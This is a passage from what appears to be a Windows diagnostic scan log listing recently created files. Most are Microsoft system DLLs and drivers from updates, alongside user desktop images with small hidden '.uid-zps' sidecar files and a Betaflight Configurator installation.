2019-05-15 10:04 - 2019-05-03 07:56 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 000333824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2019-05-15 10:04 - 2019-05-03 07:55 - 003090432 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2019-05-15 10:04 - 2019-05-03 07:55 - 002166784 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2019-05-15 10:04 - 2019-05-03 07:55 - 000659968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 004929024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 001628672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 001097728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2019-05-15 10:04 - 2019-05-03 07:54 - 000961024 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000778752 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2019-05-15 10:04 - 2019-05-03 07:54 - 000776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000669184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000667136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000543744 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000535552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000507392 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2019-05-15 10:04 - 2019-05-03 07:53 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelppm.sys
2019-05-15 10:04 - 2019-05-03 07:53 - 000186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdk8.sys
2019-05-15 10:04 - 2019-05-03 07:53 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdppm.sys
2019-05-15 10:04 - 2019-05-03 07:53 - 000181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\processr.sys
2019-05-15 10:04 - 2019-05-03 06:38 - 000001310 _____ C:\WINDOWS\system32\tcbres.wim
2019-05-15 10:04 - 2019-04-23 09:13 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MixedRealityCapture.dll
2019-05-15 10:04 - 2019-04-23 08:14 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MixedRealityCapture.dll
2019-05-15 10:04 - 2019-04-19 12:55 - 001634920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2019-05-15 10:04 - 2019-04-19 12:54 - 000720200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2019-05-15 10:04 - 2019-04-19 12:40 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2019-05-15 10:04 - 2019-04-19 12:39 - 012754944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-05-15 10:04 - 2019-04-19 12:38 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDSPnf.exe
2019-05-15 10:04 - 2019-04-19 12:38 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfproc.dll
2019-05-15 10:04 - 2019-04-19 12:36 - 000346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2019-05-15 10:04 - 2019-04-19 12:34 - 000522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2019-05-15 10:04 - 2019-04-19 11:44 - 001454648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2019-05-15 10:04 - 2019-04-19 11:37 - 000607960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2019-05-15 10:04 - 2019-04-19 11:30 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfproc.dll
2019-05-15 10:04 - 2019-04-19 11:28 - 011940864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-05-15 10:04 - 2019-04-19 11:26 - 002405888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2019-05-15 10:04 - 2019-04-19 11:25 - 000423936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2019-05-15 10:04 - 2019-04-19 07:07 - 000985400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2019-05-15 10:04 - 2019-04-19 07:06 - 002571632 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000798520 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000713264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000436024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000274232 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2019-05-15 10:04 - 2019-04-19 07:02 - 000831800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2019-05-15 10:04 - 2019-04-19 07:01 - 001982008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2019-05-15 10:04 - 2019-04-19 07:01 - 000581592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2019-05-15 10:04 - 2019-04-19 07:01 - 000576016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2019-05-15 10:04 - 2019-04-19 07:01 - 000380728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-05-15 10:04 - 2019-04-19 06:43 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fcon.dll
2019-05-15 10:04 - 2019-04-19 06:42 - 004384256 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-05-15 10:04 - 2019-04-19 06:41 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2019-05-15 10:04 - 2019-04-19 06:41 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\EduPrintProv.exe
2019-05-15 10:04 - 2019-04-19 06:40 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2019-05-15 10:04 - 2019-04-19 06:40 - 000243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpnServiceDS.dll
2019-05-15 10:04 - 2019-04-19 06:40 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll
2019-05-15 10:04 - 2019-04-19 06:40 - 000167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll
2019-05-15 10:04 - 2019-04-19 06:40 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetDriverInstall.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SDDS.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingASDS.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2019-05-15 10:04 - 2019-04-19 06:39 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 002368512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000300544 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000953856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000381952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000366080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 002909696 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 001300992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000814592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000546816 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000186368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001938944 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001175552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001156608 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000607232 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000523776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000935936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000899584 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000885760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000653312 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 05:18 - 000806360 _____ C:\WINDOWS\SysWOW64\locale.nls
2019-05-15 10:04 - 2019-04-19 05:18 - 000806360 _____ C:\WINDOWS\system32\locale.nls
2019-05-15 10:04 - 2019-04-09 03:48 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000376320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2019-05-15 09:23 - 2019-05-15 09:23 - 000000110 ____H C:\Users\TATTOO NR\Desktop\2yCh4fzygIE.jpg.uid-zps
2019-05-14 09:25 - 2019-05-14 09:25 - 000000110 ____H C:\Users\TATTOO NR\Desktop\co-tak-corgon.jpg.uid-zps
2019-05-13 15:14 - 2019-05-13 15:14 - 000000110 ____H C:\Users\TATTOO NR\Desktop\d22d77da76be5eb9d79e590bd0860881.jpg.uid-zps
2019-05-13 09:32 - 2019-05-13 09:32 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59883181_270092247114057_4655140165361074176_n.jpg.uid-zps
2019-05-13 09:28 - 2019-05-13 09:28 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez y jtfjfy.png.uid-zps
2019-05-10 13:01 - 2019-05-10 13:01 - 000000000 _____ C:\Users\TATTOO NR\Desktop\Nový textový dokument.txt
2019-05-09 19:52 - 2019-05-09 19:52 - 000000110 ____H C:\Users\TATTOO NR\Desktop\cover.jpg.uid-zps
2019-05-09 16:54 - 2019-06-11 09:07 - 000001405 _____ C:\Users\TATTOO NR\Desktop\Betaflight Configurator.lnk
2019-05-09 16:54 - 2019-05-09 16:54 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Betaflight
2019-05-09 16:54 - 2019-05-09 16:54 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\betaflight-configurator
2019-05-09 16:52 - 2019-05-09 16:52 - 000000000 ____D C:\Program Files (x86)\Betaflight
2019-05-09 16:47 - 2019-05-09 16:51 - 082048670 _____ C:\Users\TATTOO NR\Downloads\betaflight-configurator-installer_10.5.1_win32.exe
2019-05-09 09:00 - 2019-05-09 09:00 - 000000110 ____H C:\Users\TATTOO NR\Desktop\50333866_229676244575384_4473366742688595968_n.jpg.uid-zps
2019-05-07 13:35 - 2019-05-07 13:35 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59848646_430756721048088_676545310050222080_n.jpg.uid-zps
2019-05-07 12:34 - 2019-05-07 12:36 - 000000000 ____D C:\ProgramData\HP
2019-05-06 14:59 - 2019-05-06 14:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59713434_1280090952139411_7822264906450731008_n.jpg.uid-zps
2019-05-06 09:19 - 2019-05-06 09:19 - 000000110 ____H C:\Users\TATTOO NR\Desktop\a12_angel_by_articmoonsky-d2zou38.jpg.uid-zps
2019-04-30 09:00 - 2019-04-30 09:00 - 000000110 ____H C:\Users\TATTOO NR\Desktop\56887114_350001178976974_3740757377687748608_n.jpg.uid-zps
2019-04-30 08:56 - 2019-04-30 08:56 - 000000110 ____H C:\Users\TATTOO NR\Desktop\90496b7ad5fe39781948a4f4ff367237.jpg.uid-zps
2019-04-19 09:03 - 2019-04-19 09:03 - 000000110 ____H C:\Users\TATTOO NR\Desktop\-xhb5PQiQ0mLryhp08uEkQ.jpg.uid-zps
2019-04-19 09:00 - 2019-04-19 09:00 - 000000110 ____H C:\Users\TATTOO NR\Desktop\2895683.jpg.uid-zps
2019-04-18 09:13 - 2019-04-18 09:13 - 000000110 ____H C:\Users\TATTOO NR\Desktop\48406988_212477236353110_4123837596855959552_n.jpg.uid-zps
2019-04-16 09:29 - 2019-04-16 09:29 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53347565_772680483131945_3388894015913984000_n.jpg.uid-zps
2019-04-15 14:57 - 2019-04-15 14:57 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\PUSH Entertainment
2019-04-15 14:57 - 2019-04-15 14:57 - 000000000 ____D C:\ProgramData\PUSH Entertainment
2019-04-15 09:44 - 2019-04-15 09:44 - 000000110 ____H C:\Users\TATTOO NR\Desktop\mandala-lotus-designs-lotus-flower-tattoo-design-on-tatted-up.jpg.uid-zps
2019-04-12 09:02 - 2019-04-12 09:02 - 000000110 ____H C:\Users\TATTOO NR\Desktop\636644945194563959.png.uid-zps
2019-04-12 08:57 - 2019-04-12 08:57 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Symbolic-Decals-Triple-Horn-Of-Odin-Decal-Sticker-Vinyl-Decal-Sticker__15659.1506198913.jpg.uid-zps
2019-04-11 14:55 - 2019-04-11 14:55 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53894691_2631269396912723_7807712191452282880_n.jpg.uid-zps
2019-04-11 09:40 - 2019-04-11 09:40 - 000000110 ____H C:\Users\TATTOO NR\Desktop\dac9b1d1cfdc928a754c623a4080eec0.jpg.uid-zps
2019-04-11 09:15 - 2019-04-11 09:15 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez názvu.pngyv5rvyw.png.uid-zps
2019-04-11 09:10 - 2019-04-11 09:10 - 000000110 ____H C:\Users\TATTOO NR\Desktop\49947531_363112507834625_4661429401936723968_n.jpg.uid-zps
2019-04-10 09:36 - 2019-04-10 09:36 - 000000110 ____H C:\Users\TATTOO NR\Desktop\image.jpg.uid-zps
2019-04-10 09:12 - 2019-04-02 14:38 - 000094008 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2019-04-10 09:12 - 2019-04-02 14:18 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2019-04-10 09:12 - 2019-04-02 14:16 - 001030144 _____ (Microsoft Corporation) C:\WINDOWS\system32\termsrv.dll
2019-04-10 09:12 - 2019-04-02 14:15 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleprn.dll
2019-04-10 09:12 - 2019-04-02 14:13 - 001605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2019-04-10 09:12 - 2019-04-02 14:11 - 001857536 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2019-04-10 09:12 - 2019-04-02 14:10 - 000130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\luafv.sys
2019-04-10 09:12 - 2019-04-02 14:10 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxssrv.dll
2019-04-10 09:12 - 2019-04-02 11:11 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2019-04-10 09:12 - 2019-04-02 11:10 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleprn.dll
2019-04-10 09:12 - 2019-04-02 11:07 - 001586688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2019-04-10 09:12 - 2019-04-02 10:21 - 002467536 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2019-04-10 09:12 - 2019-04-02 10:21 - 000735680 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2019-04-10 09:12 - 2019-04-02 10:20 - 002719032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2019-04-10 09:12 - 2019-04-02 10:19 - 000786080 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2019-04-10 09:12 - 2019-04-02 09:48 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netbt.sys
2019-04-10 09:12 - 2019-04-02 09:47 - 001214464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2019-04-10 09:12 - 2019-04-02 09:45 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2019-04-10 09:12 - 2019-04-02 09:44 - 001724416 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpserverbase.dll
2019-04-10 09:12 - 2019-04-02 09:44 - 001421312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpbase.dll
2019-04-10 09:12 - 2019-04-02 07:05 - 001989544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2019-04-10 09:12 - 2019-04-02 07:04 - 000604008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2019-04-10 09:12 - 2019-04-02 07:04 - 000560600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2019-04-10 09:12 - 2019-04-02 06:41 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpserverbase.dll
2019-04-10 09:12 - 2019-04-02 06:41 - 001235968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpbase.dll
2019-04-10 09:12 - 2019-04-02 06:41 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2019-04-10 09:12 - 2019-04-02 06:40 - 001073664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2019-04-10 09:12 - 2019-03-14 16:52 - 003933296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2019-04-10 09:12 - 2019-03-14 16:51 - 000157192 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
2019-04-10 09:12 - 2019-03-14 16:35 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfoext.dll
2019-04-10 09:12 - 2019-03-14 16:34 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2019-04-10 09:12 - 2019-03-14 16:33 - 000182784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdpdr.sys
2019-04-10 09:12 - 2019-03-14 16:33 - 000082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storqosflt.sys
2019-04-10 09:12 - 2019-03-14 16:33 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\RpcPing.exe
2019-04-10 09:12 - 2019-03-14 16:31 - 000198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2019-04-10 09:12 - 2019-03-14 16:30 - 000675328 _____ (Microsoft Corporation) C:\WINDOWS\system32\objsel.dll
2019-04-10 09:12 - 2019-03-14 16:30 - 000440832 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2019-04-10 09:12 - 2019-03-14 16:29 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2019-04-10 09:12 - 2019-03-14 16:28 - 000560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsound.dll
2019-04-10 09:12 - 2019-03-14 16:08 - 003611264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2019-04-10 09:12 - 2019-03-14 15:56 - 000160768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2019-04-10 09:12 - 2019-03-14 15:55 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RpcPing.exe
2019-04-10 09:12 - 2019-03-14 15:53 - 000625664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2019-04-10 09:12 - 2019-03-14 15:53 - 000559104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\objsel.dll
2019-04-10 09:12 - 2019-03-14 15:53 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2019-04-10 09:12 - 2019-03-14 15:52 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsound.dll
2019-04-10 09:12 - 2019-03-14 10:57 - 000611640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2019-04-10 09:12 - 2019-03-14 10:56 - 000375096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2019-04-10 09:12 - 2019-03-14 10:38 - 000090360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mpr.dll
2019-04-10 09:12 - 2019-03-14 10:37 - 001171568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2019-04-10 09:12 - 2019-03-14 10:28 - 000152072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2019-04-10 09:12 - 2019-03-14 10:27 - 000097600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mpr.dll
2019-04-10 09:12 - 2019-03-14 10:26 - 002421048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-04-10 09:12 - 2019-03-14 10:26 - 001014344 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2019-04-10 09:12 - 2019-03-14 10:26 - 000481048 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase_enclave.dll
2019-04-10 09:12 - 2019-03-14 10:26 - 000175416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spacedump.sys
2019-04-10 09:12 - 2019-03-14 10:22 - 002700288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2019-04-10 09:12 - 2019-03-14 10:19 - 002969600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2019-04-10 09:12 - 2019-03-14 10:18 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2019-04-10 09:12 - 2019-03-14 10:18 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credui.dll
2019-04-10 09:12 - 2019-03-14 10:18 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 002258944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000261632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wcmapi.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntlanman.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000415744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000318464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000195072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShellCommonCommonProxyStub.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\negoexts.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 001070080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 000856576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2019-04-10 09:12 - 2019-03-14 10:14 - 000735744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 000345088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2019-04-10 09:12 - 2019-03-14 10:14 - 000330752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.Workflow.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 000138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
